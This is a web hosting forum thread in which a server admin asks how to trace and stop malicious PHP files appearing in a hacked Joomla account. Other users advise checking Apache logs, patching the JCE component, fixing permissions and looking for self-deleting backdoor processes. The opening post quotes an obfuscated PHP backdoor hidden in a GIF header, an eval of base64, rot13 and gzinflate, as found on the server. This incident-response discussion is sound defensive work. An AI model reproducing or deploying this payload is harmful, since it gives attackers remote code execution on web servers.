Checking strange activity on account

madpato

Well-Known Member
May 30, 2008
51
1
58
Hello

I have a user which i believe has been hacked and sends spam, well i have CSF and it let me know which file was doing this, got rid of it (yesterday) but today more php files showed up on the same folder, so i assume this is not over. Even i got some gif files with strange code like this:

Code:
GIF89aGbkht
<?php eval(gzinflate(str_rot13(base64_decode('rUl6QttVEP58VfyHci+SHRVBHDlmJZyRcHO4LIHhwYpIF23jtrqE5xH/vzNrOWKEcrRohb8/rM8/MzoYrJUisaymVEcXU3e3uYmGICWS3hNbcuJ04CqOoN+hfOXBpy+6cm2H3t8fNjc690MIksioMCcguOGge+Bge0W74Yji8onSj0VJ8NohT9AbVorhdRg/Dfy7DdRRfDnu1wUumZrCgLHJxzoopAQ+eGGVdYHX0p3Wm2YTnuykH00KiEPEUQzoojGaZZXSBf27YJY8dzZNXCTOH8NHRdhifD0bh+WAUrjjlWXEuva0Um7JPz2uWfZqizFhxQbcJtTzRem3GtMjIX9gUSZCZMeWe77dZAXRKbrpNukjtqtq/iFRrT3pinaq6cIjJKZJPTACJPxw97ROdkhJ/2oH44O/E1pMEmHiL8xnFU4bk38x4MPJJEZNOv3j/YDhofUW3Hz6IE/XjhqQBhK0OuAutSD4m8QACU2O0koe0PnEJiupO7EeBNleVRbuo32l8x86hSHqhLuNPZEapgqDEA+O2p48rZTvkjfylFNfXP5IDrL+fpFaElDlAmcpWjjsEmL7ApVeY5SCg9PBoT49ynrMiegk8EFJMGW/mJQ+o4V8MJchkQJM8pevaqBrnb6mv40Nlz7LKvt+BvY/IDp39aKQcGnFQ5EhzUcmUsWk7KTOsUt6Wg9X8QgmXciZMV0FSxnoZPk0/q3Mm0pQXDU1dcF8zmIB/o8bZxEra8/S+89sgp0X0+QDYal4nQhyB/CoCYtBDUBANis2N4s4A03i4aLxvPhD94nbwq/X/CQ29u42wIEz9VfEeQnQzuZJjsZZl4E/hU=')))); ?>
Now i want to know where can i look to see the origin of this, tried ftp logs and nothing, /var/log/messages nothing regarding the location (or even mentioning the user account).
What i do know that this user has an old joomla install i know for a fact that is probably the reason of this, what i need to know is a server-side solution to stop the creation of those files. Maybe changing permission of folders?

Any ideas? Thanks.
 

quietFinn

Well-Known Member
Feb 4, 2006
1,222
87
178
Finland
cPanel Access Level
Root Administrator
You shold check that account's access logs:
/home/CPANELUSERNAME/access_logs
 

quizknows

Well-Known Member
Oct 20, 2009
1,008
87
78
cPanel Access Level
DataCenter Provider
Check /usr/local/apache/domlogs

However, they need to update / patch their software. No amount of server-side security can make up for users running hackable applications. Do not allow people to run vulnerable appliations on your server. A good modsecurity ruleset can stop a lot of hacks but it is not foolproof.

If the file in quesiton is in public_html/images/stories/ or public_html/tmp/ they probably have a hackable com_jce component. Check the date on files inside of public_html/components/com_jce/. If they are more than a year or two old that is the easiest way for an attacker to upload that code to a joomla site.
 

cPanelMichael

Administrator
Staff member
Apr 11, 2011
47,913
2,202
363
Hello :)

Also, check to see if any of the directories within this account are using insecure permissions (e.g. 0777). It's possible the scripts are uploaded through a Joomla plugin that allows uploads of this nature.

Thank you.
 

sehh

Well-Known Member
Feb 11, 2006
579
5
168
Europe
There is another cool way they use to do this, once they compromise an account, they upload a file, execute it and delete it, while leaving the process alive and kicking in memory!

Thus, there is no file for you to find, its just not there because it deletes itself.

Once this process is started, the file will open a TCP port and listen for remote commands, execute code, upload files in tmp directories, send information about the server to a remote listener, so on and so forth.

So check the running processes, I've seen them use process names like "mysql" and similar ones.

I found their trick quite effective and imaginative! :)